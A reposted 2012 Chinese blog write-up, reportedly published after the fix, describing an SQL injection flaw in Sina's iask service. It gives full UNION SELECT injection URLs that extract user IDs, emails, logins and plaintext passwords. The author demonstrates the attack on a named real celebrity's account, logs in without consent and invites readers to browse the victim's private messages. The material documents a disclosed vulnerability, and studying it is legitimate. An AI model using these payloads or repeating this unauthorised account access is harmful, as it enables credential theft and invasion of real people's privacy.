【转】2012年新浪微博用户密码泄露漏洞（图片解析）

相关厂商：www.sina.com

作者：http://weibo.com/evilniang

发现时间：2012-1-1

漏洞类型：sql注射

危害等级：高

漏洞状态：已修复



首先申明：该漏洞发现后本人已联系新浪官方修复漏洞，目前漏洞以修补。文章内容公布，仅供参考学习。



新浪网iask存在sql注射漏洞，利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。



漏洞存在点: http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9



漏洞利用方式:



http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--



这里我们通过构造数据库查询语句获得用户uid=1303977362的uid、login、email、passwd等信息。通过修改字段还可以获取其他信息 。



直接举个例子比如我们通过新浪微波查找到刘谦，点击他的个人资料。我们可以再浏览器地址栏处看到刘谦的uid(新浪用户数字id)，此处uid为12715428867







直接构造地址



http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--



直接获得刘谦的账号和密码







这里账号是luchenmagic密码为2lo*****（保密）



尝试登陆







成功登陆。刘谦微薄。这里你可以看看你的偶像的各种私信，聊天记录之类的。



接下来的事情你可以自由发挥了。但是对于一个黑客而言，这只不过是一个开始而已（这里我并无恶意，拿刘谦的账号来测试只是为了致敬，希望有机会能够见证奇迹！）。



后话：



1.2011年年底的csdn、天涯等用户库的泄露只不过是冰山一脚。



2.新浪在csdn、天涯等用户库泄露后申称新浪数据库并没有泄露，而且密码是密文保存。这里要提出质疑了，数据库密码明明是明文保存。至少iask中大部分用户是明文保存密码（部分用户查不到密码）。至于用户信息是否泄露，这个不用说了把？



3.网络泄密涉及到太多。不管是普通网民，还是明星名人，都被牵涉进来。这里测试不少明星，基本上都能通过微薄获取他们的私人信息，甚至登陆他们的msn。（香港爆料杂志来找我把。开个玩笑。。。）



4.这个漏洞发现后我便通知了新浪官方,新浪在漏洞反馈和应急处理这方面做的不够快。收到漏洞后连给我回个邮件或者表示感谢都没有。（我是无私奉献白帽子，被活雷锋了。）



5.祝新年快乐。

----------------------------------------------------

游侠补充：

　　刚从流量统计系统看到阅读者暴增，原来是文中例子的主角刘谦先生在微博发了一条……好吧：这个事情，仅仅是刘谦先生的粉丝在做个安全测试，并无恶意。我们都喜欢刘先生的魔术。

　　谢谢刘谦先生给我博客打广告……来西安我请你吃肉夹馍、羊肉泡馍——管饱！ :)

　　另：文章是新浪打了补丁之后作者才发出来的，看到本文的时候还想测试的话……晚了。嘿嘿